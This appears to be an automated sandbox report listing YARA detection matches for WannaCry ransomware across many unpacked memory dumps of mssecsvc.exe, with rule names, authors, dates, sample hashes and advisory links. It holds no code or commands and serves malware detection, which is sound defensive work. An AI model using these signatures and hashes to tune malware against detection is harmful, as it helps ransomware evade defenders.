Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE; Matched rule: WannaCry_Ransomware_Gen (date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A)
Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE; Matched rule: wanna_cry_ransomware_generic (date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set)
Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE; Matched rule: Win32_Ransomware_WannaCry (tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware)
Source: 11.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE; Matched rule: WannaCry_Ransomware (date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T)
Source: 11.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE; Matched rule: wanna_cry_ransomware_generic (date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set)
Source: 11.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE; Matched rule: Win32_Ransomware_WannaCry (tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware)
Source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: WannaCry_Ransomware (date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T)
Source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: WannaCry_Ransomware_Gen (date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A)
Source: 4.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPE; Matched rule: WannaCry_Ransomware (date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T)
Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE; Matched rule: WannaCry_Ransomware (date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T)
Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE; Matched rule: WannaCry_Ransomware_Gen (date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A)
Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE; Matched rule: wanna_cry_ransomware_generic (date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set)
Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE; Matched rule: Win32_Ransomware_WannaCry (tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware)
Source: 4.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPE; Matched rule: wanna_cry_ransomware_generic (date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set)
Source: 6.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPE; Matched rule: WannaCry_Ransomware (date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T)
Source: 6.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPE; Matched rule: wanna_cry_ransomware_generic (date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set)
Source: 6.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPE; Matched rule: Win32_Ransomware_WannaCry (tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware)
Source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: wanna_cry_ransomware_generic (date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set)
Source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Win32_Ransomware_WannaCry (tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware)
Source: 4.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPE; Matched rule: Win32_Ransomware_WannaCry (tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware)
Source: 11.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE; Matched rule: WannaCry_Ransomware (date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T)
Source: 11.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE; Matched rule: wanna_cry_ransomware_generic (date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set)
Source: 11.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE; Matched rule: Win32_Ransomware_WannaCry (tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware)
Source: 6.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPE; Matched rule: WannaCry_Ransomware (date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T)
Source: 6.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPE; Matched rule: wanna_cry_ransomware_generic (date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set)
Source: 6.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPE; Matched rule: Win32_Ransomware_WannaCry (tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware)
Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: WannaCry_Ransomware (date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T)
Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: WannaCry_Ransomware_Gen (date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A)
Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: wanna_cry_ransomware_generic (date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set)
Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Win32_Ransomware_WannaCry (tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware)
Source: 6.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE; Matched rule: WannaCry_Ransomware (date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T)
Source: 6.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE; Matched rule: WannaCry_Ransomware_Gen (date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A)
Source: 6.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPE; Matched rule: WannaCry_Ransomware (date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T)
Source: 4.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPE; Matched rule: WannaCry_Ransomware (date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T)
Source: 6.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPE; Matched rule: WannaCry_Ransomware (date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T)
Source: 6.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPE; Matched rule: wanna_cry_ransomware_generic (date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set)
Source: 6.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPE; Matched rule: Win32_Ransomware_WannaCry (tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware)
Source: 6.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPE; Matched rule: wanna_cry_ransomware_generic (date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set)
Source: 4.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPE; Matched rule: wanna_cry_ransomware_generic (date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set)
Source: 6.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE; Matched rule: wanna_cry_ransomware_generic (date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set)
Source: 6.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE; Matched rule: Win32_Ransomware_WannaCry (tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware)
Source: 6.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPE; Matched rule: Win32_Ransomware_WannaCry (tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware)
Source: 4.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPE; Matched rule: Win32_Ransomware_WannaCry (tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware)
Source: 4.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE; Matched rule: WannaCry_Ransomware (date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T)
Source: 4.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE; Matched rule: wanna_cry_ransomware_generic (date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set)
Source: 4.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE; Matched rule: Win32_Ransomware_WannaCry (tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware)
Source: 4.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE; Matched rule: WannaCry_Ransomware (date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T)
Source: 4.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE; Matched rule: wanna_cry_ransomware_generic (date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set)
              Source: 4.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 11.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 11.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 11.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 11.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 6.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 6.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 6.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 11.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 11.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 11.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 11.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 11.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 11.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 11.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 6.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 6.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 6.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 6.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 11.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 11.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 11.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 6.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 6.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 6.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 6.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
